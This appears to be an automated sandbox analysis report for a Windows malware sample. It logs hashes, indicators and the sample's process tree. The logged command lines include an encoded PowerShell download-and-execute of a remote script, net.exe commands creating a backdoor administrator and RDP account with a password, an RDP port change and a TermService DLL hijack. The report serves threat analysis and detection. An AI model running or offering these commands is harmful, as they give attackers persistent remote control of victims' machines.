Analysis
- max time kernel: 77s
- max time network: 139s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 11-11-2020 11:08

Static task: static1

Behavioral task: behavioral1
- Sample: f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
- Resource: win7v20201028

Behavioral task: behavioral2
- Sample: f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
- Resource: win10v20201028
General
- Target: f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
- Size: 3.4MB
- MD5: 09fd827d8b404557a5c9e06810247c12
- SHA1: 592cec34a644689ea9337a1da194707f795adc14
- SHA256: f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342
- SHA512: 6808ccdda230ad235cd6322c264c834783febd71a6f658f7d81df30c1689bf10c0b305978f65d1c4c572d0afce2b811b32494ed3f3f476e97ffc923c5c18060a
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Blacklisted process makes network request (9 IoCs)
Processes:
  flow  pid   process
  26    1620  powershell.exe
  28    1620  powershell.exe
  29    1620  powershell.exe
  30    1620  powershell.exe
  32    1620  powershell.exe
  34    1620  powershell.exe
  36    1620  powershell.exe
  38    1620  powershell.exe
  40    1620  powershell.exe
Modifies RDP port number used by Windows (1 TTP)

Sets DLL path for service in the registry (2 TTPs)

Processes:
  resource                         yara_rule
  \Windows\Branding\mediasrv.png   upx
  \Windows\Branding\mediasvc.png   upx
Deletes itself (1 IoC)
Processes:
  pid  process
  188  powershell.exe

Loads dropped DLL (2 IoCs)
Processes:
  pid   process
  2364
  2364

Modifies service (2 TTPs, 2 IoCs)
Processes (reg.exe):
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters
- Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"
Drops file in Program Files directory (4 IoCs)
Processes (powershell.exe):
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI

Drops file in Windows directory (19 IoCs)
Processes (powershell.exe):
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB975.tmp
- File created: C:\Windows\branding\mediasvc.png
- File opened for modification: C:\Windows\branding\ShellBrd
- File opened for modification: C:\Windows\branding\mediasrv.png
- File opened for modification: C:\Windows\branding\mediasvc.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ifkpbtiu.15w.ps1
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB965.tmp
- File created: C:\Windows\branding\wupsvc.jpg
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB954.tmp
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- File opened for modification: C:\Windows\branding\Basebrd
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0gwgrw0g.o5v.psm1
- File created: C:\Windows\branding\mediasrv.png
- File opened for modification: C:\Windows\branding\wupsvc.jpg
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIB943.tmp
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIBA41.tmp
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Modifies data under HKEY_USERS (217 IoCs)
Modifies registry key (1 TTP, 1 IoC)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
  description             flow  ioc
  HTTP User-Agent header  28    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  29    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  30    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  32    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
  pid   process
  188   powershell.exe  (6 entries)
  1620  powershell.exe  (3 entries)

Suspicious behavior: LoadsDriver (2 IoCs)
Processes:
  pid  process
  616
  616
Suspicious use of AdjustPrivilegeToken (77 IoCs)
Processes:
  pid 188 powershell.exe, Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the same sequence is repeated for pid 188 throughout the log)
Suspicious use of WriteProcessMemory (68 IoCs)
Processes (indentation and [n] show the depth in the process tree)

[1] C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\f3de66806147c1f89b5c667f35ce8998e93bfa7911f20583492b2700d8e4f342.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4ED1.tmp" "c:\Users\Admin\AppData\Local\Temp\zoqd1035\CSC463BC4AF188A4A8598802B9627B669C5.TMP"
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user updwin Ghasar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user updwin Ghasar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user updwin Ghasar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user updwin mHhAj97g /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user updwin mHhAj97g /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user updwin mHhAj97g /add

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" updwin /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user updwin mHhAj97g
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user updwin mHhAj97g
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user updwin mHhAj97g

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blacklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
Downloads
- C:\Users\Admin\AppData\Local\Temp\RES4ED1.tmp
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
- C:\Users\Admin\AppData\Local\Temp\get-points.zip
- C:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.dll
- \??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\CSC463BC4AF188A4A8598802B9627B669C5.TMP
- \??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.0.cs
- \??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.cmdline
- \Windows\Branding\mediasrv.png
- \Windows\Branding\mediasvc.png